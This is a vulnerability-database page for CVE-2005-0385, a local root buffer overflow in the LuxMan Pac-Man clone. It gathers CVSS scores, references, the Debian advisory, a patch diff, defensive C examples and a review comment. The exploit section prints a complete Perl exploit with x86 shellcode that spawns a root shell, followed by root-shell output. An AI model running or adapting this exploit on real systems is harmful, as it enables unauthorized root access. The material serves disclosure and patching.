CVE-2005-0385
CVSS 7.2
Published: 2005-05-02 00:00:00
Last revised: 2008-09-10 15:35:28

[Original] Buffer overflow in luxman before 0.41, if used with certain insecure svgalib libraries, allows local users to execute arbitrary code via a long -f command line argument.


[CNNVD] LuxMan Local Buffer Overflow Vulnerability (CNNVD-200505-299)

        In luxman versions before 0.41, when used with certain insecure svgalib libraries, a buffer overflow allows local users to execute arbitrary code via a long -f command-line argument.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the whole system down]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/a:frank_mcingvale:luxman:0.41_17
cpe:/a:frank_mcingvale:luxman:0.41

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0385
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0385
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-299
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/12797
(PATCH)  BID  12797
http://xforce.iss.net/xforce/xfdb/19680
(UNKNOWN)  XF  luxman-bo-execute-commands(19680)
http://www.securityfocus.com/archive/1/393195/2005-03-13/2005-03-19/0
(UNKNOWN)  BUGTRAQ  20050314 DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow'
http://www.digitalmunition.com/DMA%5B2005-0310a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0310a].txt
http://www.debian.org/security/2005/dsa-693
(VENDOR_ADVISORY)  DEBIAN  DSA-693
http://secunia.com/advisories/14582
(VENDOR_ADVISORY)  SECUNIA  14582

- Vulnerability information

LuxMan Local Buffer Overflow Vulnerability
High severity  Buffer overflow
Published: 2005-05-02 00:00:00  Updated: 2005-10-20 00:00:00
Local
        In luxman versions before 0.41, when used with certain insecure svgalib libraries, a buffer overflow allows local users to execute arbitrary code via a long -f command-line argument.

- Advisories and patches

        The vendor has released an upgraded package that fixes this issue; it can be obtained from:
        http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2_i386.deb

- Vulnerability information (877)

Frank McIngvale LuxMan 0.41 Local Buffer Overflow Exploit (EDBID:877)
linux local
2005-03-14 Verified
Kevin Finisterre
#!/usr/bin/perl -w
#
# luxman exploit
#
# ii  luxman         0.41-19.1      Pac-Man clone (svgalib based)
#
# Tested with "security compat" set in /etc/vga/libvga.config on debian unstable 3.1
#
# kfinisterre@jdam:~$ ./luxman_ex.pl
# LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
# LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.
# 
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# Using SIS driver, 2048KB. Chiptype=8
# svgalib 1.4.3
# You must be the owner of the current console to use svgalib.
# Not running in a graphics capable console,
# and unable to find one.
# svgalib: Failed to initialize mouse.
# 
# The frame rate is now set to 1 frames per second.
# If the game seems too fast, too slow, or too jerky,
# you can adjust this value the `-r' option.
# 
# Calibrating delay...-664257
# Sound server started [pid:7082]
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)
#

# Optional stack-address offset taken from the command line; defaults to 0.
($offset) = @ARGV,$offset || ($offset = 0);

# 512-byte NOP sled followed by x86 Linux shellcode:
#   setresuid(0,0,0)  (syscall 0xa4) -- succeeds only because the saved uid is
#                     still 0 in the 'security compat' / old-svgalib case
#   execve("/bin/sh") and then exit()
$sc  = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

# The shellcode travels in the environment, which sits just below the top of
# the stack at a fairly predictable address on these (pre-ASLR) targets.
$ENV{"FOO"} = $sc;

# 8732 bytes of filler reach the saved return address on the author's build;
# two copies of a guessed address near the top of the stack (0xbfffffff - 512,
# adjusted by $offset) overwrite it and land in the NOP sled inside FOO.
$buf = "A" x 8732;
$buf .= (pack("l",(0xbfffffff-512+$offset)) x2);

#exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf");
exec("/usr/games/luxman -r 1 -f $buf");

# milw0rm.com [2005-03-14]

- Vulnerability information (F36632)

luxman_ex2.pl (PacketStormID:F36632)
2005-03-17 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,overflow,local,root
CVE-2005-0385

LuxMan 0.41-19.1 local root exploit that makes use of a buffer overflow.

- Vulnerability information (F36631)

DMA-2005-0310a.txt (PacketStormID:F36631)
2005-03-17 00:00:00
Kevin Finisterre  digitalmunition.com
advisory,overflow,local,root
CVE-2005-0385

LuxMan 0.41-19.1 is susceptible to local root compromise via a buffer overflow.

DMA[2005-0310a] - 'Frank McIngvale LuxMan buffer overflow'
Author: Kevin Finisterre
Vendor: frankm@nuance.com (broken)
Product: 'luxman'
References: (CAN-2005-0385)
http://www.digitalmunition.com/DMA[2005-0310a].txt 
http://www.debian.org/security/2005/dsa-693

Description: 
LuxMan is a Pac-Man clone for SVGALIB. It includes color, sound, several 
different levels, and difficulty settings. LuxMan also comes with tools 
for making your own levels and customizing the game. Woohoo! Let's chomp
some power pellets! I've got Pac-Man fever, folks. 

The following statement from http://packages.debian.org/stable/games/luxman
led me to audit this package:

"WARNING: This package CONTAINS SETUID ROOT BINARIES. This is a possible
SECURITY RISK. I don't want to tell you not to afraid, but this package is 
in Debian since 4 years w/o problems."

Be afraid! Shiver and quake in your boots! Well, not really... the author 
did a pretty good job of preventing "potential" exploits from happening. 
(hp is rubbing off on me). The snippet below is taken from a file included
in luxman_0.41.orig.tar.gz called README.Security:

----------- snip -----------

[This is perhaps overly cautious of me, but I'd rather be safe.]

LuxMan, like all other programs which use `svgalib', runs
setuid-root. That is, when it starts running, it is running
with root privileges. This means that it could delete all the files
on your hard drive, etc., if it wanted to.

The VERY FIRST thing the program does (after printing a copyright
notice) is to call vga_init(). `vga_init()' is an svgalib routine
which initializes the VGA card and gives up root privileges.

LuxMan NEVER attempts to regain root privileges after this point.

----------- snip -----------

As stated above, the author did a good job of limiting the impact of this
bug. By calling vga_init() the bug is pretty much curbed: vga_init() 
detects the chipset and gives up supervisor rights immediately. 

If we plan to exploit this bug we have only two options: hope that the
machine is running a very old version of svgalib, or cross your fingers
for 'security compat' in the config file. If you have neither of these you are
pretty much S.O.L., unless you have some other technique for bypassing vga_init(). 

Svgalib versions prior to 1.2.11 had a security hole whereby it was possible 
to regain root privileges even after a vga_init() call. Some programs may 
(accidentally) rely on the old vga_init() behaviour (which was probably due to the 
author not knowing about saved uids, which may not even have existed in
Linux at that time). Because of this svgalib includes an option to revert
to the old behaviour: placing 'security compat' in /etc/vga/libvga.conf (on 
Debian, /etc/vga/libvga.config) reinstates it. 
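The saved-uid mechanism described above, as an added example (not svgalib's or luxman's code): a small C program that performs both kinds of drop and then tries to become root again. Assumptions: Linux/glibc uid semantics, and uid 65534 being an unprivileged account (it is only used when the program starts as root). Started as root it reproduces what 'security compat' hands an attacker (effective-uid-only drop, root comes back); started as an ordinary user both drops are no-ops and neither regain succeeds.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumption: uid 65534 ("nobody") is an unprivileged account on the host.
 * It is only used when the demo itself is started as uid 0. */
#define UNPRIV_UID ((uid_t)65534)

/* The uid to drop to: the real uid of the invoking user, as a setuid-root
 * game would use, or nobody when the real uid is already 0. */
static uid_t drop_target(void)
{
    uid_t ru = getuid();
    return ru == 0 ? UNPRIV_UID : ru;
}

/* Try to get root back after a drop. Returns 1 if seteuid(0) succeeded (the
 * drop was reversible), 0 if the kernel refused with EPERM, -1 on any other
 * error. When it succeeds the process is running as root again. */
static int try_regain_root(void)
{
    if (seteuid(0) == 0)
        return 1;
    return errno == EPERM ? 0 : -1;
}

/* Old-svgalib style: change only the effective uid. With root privilege the
 * saved set-user-ID stays 0, and an unprivileged seteuid() may always switch
 * to the saved uid, so the "drop" is reversible (the 'security compat' case). */
int insecure_drop_and_check(void)
{
    uid_t t = drop_target();
    if (seteuid(t) != 0)
        return -1;
    return try_regain_root();
}

/* Permanent drop: when the caller has root privilege, setuid() on Linux sets
 * the real, effective AND saved uid, leaving nothing to come back to. The
 * result is verified rather than assumed. */
int secure_drop_and_check(void)
{
    uid_t t = drop_target();
    if (setuid(t) != 0)
        return -1;
    if (getuid() != t || geteuid() != t)
        return -1;
    return try_regain_root();
}

/* Runs both drops in sequence. Returns 0 when the behaviour matches the
 * advisory: the effective-uid-only drop is reversible exactly when the
 * process started as root, and the full drop is never reversible. */
int run_demo(void)
{
    int started_as_root = (geteuid() == 0);
    if (insecure_drop_and_check() != started_as_root)
        return 1;
    if (secure_drop_and_check() != 0)
        return 2;
    return 0;
}

int main(void)
{
    printf("starting euid %u (%s)\n", (unsigned)geteuid(),
           geteuid() == 0 ? "root: compat behaviour will be visible"
                          : "unprivileged: both drops are no-ops");
    printf("seteuid-only drop, root regained: %d\n", insecure_drop_and_check());
    printf("setuid drop, root regained:       %d\n", secure_drop_and_check());
    return 0;
}
```

Compile with `cc -o dropdemo dropdemo.c` and run it once as root and once as a normal user to see the difference. The irreversibility check (calling seteuid(0) after the drop and expecting EPERM) is the test a setuid program should run on itself: a successful return from setuid() alone does not prove the saved uid changed.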

If either of the above conditions is met, exploitation can be done as shown below. 

By providing an overly long argument to the '-f' option a fixed buffer is 
overflowed and, if you are lucky, you get a root shell. 

kfinisterre@kfinisterre01:~$ id
uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)

kfinisterre@kfinisterre01:~$ ./luxman_ex2.pl
LuxMan v0.41, Copyright (c) 1995 Frank McIngvale
LuxMan comes with ABSOLUTELY NO WARRANTY; see COPYING for details.

You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.
Using EGA driver.
svgalib 1.4.3
You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.

The frame rate is now set to 1 frames per second.
If the game seems too fast, too slow, or too jerky,
you can adjust this value the `-r' option.

Calibrating delay...-666626
Sound server started [pid:15233]
sh-2.05b# id
uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)


To fix this vulnerability modify util.cc as follows, or upgrade the luxman
package with apt-get if you are on Debian. 

--- luxman-0.41/gtools/util.cc-orig     Wed Mar  9 20:18:58 2005
+++ luxman-0.41/gtools/util.cc  Wed Mar  9 22:21:31 2005
@@ -295,6 +295,9 @@
   if ( !strlen( basename ) )
        return 0;

+  if ( strlen( basename ) > NAME_MAX )
+        return 0;
+
   /* Try basename */
   if ( resolve_tilde( bname, basename ) == NULL )
        return 0;
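Review bot: the guard added at the top of this hunk is a caller-side length check, not a bound on the copy itself: resolve_tilde( bname, basename ) is still called with no size for bname, and nothing in the hunk shows how large bname is or that NAME_MAX bytes plus whatever the tilde expands to will fit in it. Suggest passing sizeof bname into resolve_tilde() and doing a length-limited write there (snprintf, or strncpy with explicit termination), keeping this check as a second line of defence. Minor: an over-long name now returns 0 exactly like an empty one, so a user who hits the limit gets no explanation; a message to stderr would help.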

Timeline associated with this bug:
03/09/05 Contacted ocsi@debian.org and security@debian.org
03/09/05 Bug verified by Steve Kemp
03/10/05 Joey@infodrom.org provides CVE ID
03/14/05 Debian [DSA 693-1] released to address this issue
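A bounded version of the path handling that the patch above guards, added here as an illustration and not luxman's code: resolve_tilde, bname and NAME_MAX are the names from the hunk; the function body, the constructed home directory, the PATH_MAX-sized destination and the helper names are assumptions.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif
#ifndef NAME_MAX
#define NAME_MAX 255
#endif

/* Constructed home directory. A real program would read $HOME, which is
 * attacker-controlled in a setuid binary and must be length-bounded too. */
#define FAKE_HOME "/home/player"

/* Bounded stand-in for resolve_tilde(bname, basename): expands a leading "~"
 * to the home directory and writes the result into out[outsz]. Returns out on
 * success, NULL if basename is empty, longer than NAME_MAX (the patch's new
 * check), or would not fit after expansion. An unbounded copy into a fixed
 * bname[] with no size argument is what an 8732-byte -f value overflows. */
char *resolve_tilde_bounded(char *out, size_t outsz, const char *basename)
{
    size_t n = strlen(basename);
    int w;

    if (n == 0 || n > NAME_MAX)
        return NULL;
    if (basename[0] == '~' && (basename[1] == '/' || basename[1] == '\0'))
        w = snprintf(out, outsz, "%s%s", FAKE_HOME, basename + 1);
    else
        w = snprintf(out, outsz, "%s", basename);
    if (w < 0 || (size_t)w >= outsz)   /* snprintf reports the needed length: truncated */
        return NULL;
    return out;
}

/* Mirror of the patched caller: resolve the -f argument into a static
 * bname[] and return it, or NULL when the name is rejected. */
const char *resolve_level_arg(const char *arg)
{
    static char bname[PATH_MAX];
    return resolve_tilde_bounded(bname, sizeof bname, arg);
}

/* 1 if arg resolves into a destination of sz bytes, 0 if it is rejected. */
int fits_in(size_t sz, const char *arg)
{
    char buf[PATH_MAX];
    if (sz > sizeof buf)
        sz = sizeof buf;
    return resolve_tilde_bounded(buf, sz, arg) != NULL;
}

/* An argument of the size the exploit above uses (8732 'A's), built here. */
const char *exploit_sized_arg(void)
{
    static char arg[8733];
    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    return arg;
}

int main(void)
{
    const char *ok = resolve_level_arg("~/levels/maze1");
    printf("~/levels/maze1 -> %s\n", ok ? ok : "(rejected)");
    printf("8732-byte name -> %s\n",
           resolve_level_arg(exploit_sized_arg()) ? "accepted" : "(rejected)");
    return 0;
}
```

The NAME_MAX test alone is not what makes this safe: the size passed to snprintf and the check of its return value are. NAME_MAX bounds a single path component, so it is the wrong limit for a value that may contain slashes and gets a home directory prepended; keeping the destination size explicit at the point of the copy covers callers the length check does not.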
    

- Vulnerability information (F36630)

dsa-693.txt (PacketStormID:F36630)
2005-03-17 00:00:00
advisory,overflow,arbitrary,root
linux,debian
CVE-2005-0385

Debian Security Advisory 693-1 - Kevin Finisterre discovered a buffer overflow in luxman, an SVGA based PacMan clone, that could lead to the execution of arbitrary commands as root.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 693-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
March 14, 2005                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : luxman
Vulnerability  : buffer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CAN-2005-0385

Kevin Finisterre discovered a buffer overflow in luxman, an SVGA based
PacMan clone, that could lead to the execution of arbitrary commands
as root.

For the stable distribution (woody) this problem has been fixed in
version 0.41-17.2.

For the unstable distribution (sid) this problem has been fixed in
version 0.41-20.

We recommend that you upgrade your luxman package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2.dsc
      Size/MD5 checksum:      570 a55086f936bbcfe22598ac0aeb94f8da
    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2.diff.gz
      Size/MD5 checksum:     7105 8719173e012bab5680d138d25e30b619
    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41.orig.tar.gz
      Size/MD5 checksum:   268279 aa389327578e2d65f3f5035193e407cb

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/l/luxman/luxman_0.41-17.2_i386.deb
      Size/MD5 checksum:   290762 c4123222e992a37dcf609768a20e7e8f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCNbpiW5ql+IAeqTIRAhtSAJ0d3a6I8wMPZUxKMaOGXtd5oZ7MJgCeI3NF
FIFFNlRq/R/T9Qs2asyHLSo=
=NXet
-----END PGP SIGNATURE-----

    

- Vulnerability information

14774
LuxMan luxman -f Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-03-14 Unknown
2005-03-14 Unknown

- Solution

Unknown or Incomplete

- References

- Discovered by

Unknown or Incomplete

- Vulnerability information (BID 12797)

LuxMan Local Buffer Overflow Vulnerability
Class: Boundary Condition Error   BID: 12797
Remote: No   Local: Yes
Published: 2005-03-14 12:00:00   Updated: 2009-07-12 10:56:00
Discovery is credited to Kevin Finisterre.

- Affected program versions

Frank McIngvale LuxMan 0.41 -17
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Frank McIngvale LuxMan 0.41
+ Debian Linux 3.0 ia-32

- Vulnerability discussion

LuxMan is reported prone to a local buffer overflow vulnerability.

A successful attack, can allow an attacker to gain elevated privileges on a vulnerable computer.

LuxMan 0.41-17 is reported prone to this vulnerability. It is possible that other versions are affected as well.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

Debian has released advisory DSA 693-1 to address this issue. Please see the referenced advisory for more information.


- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China dedicated to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.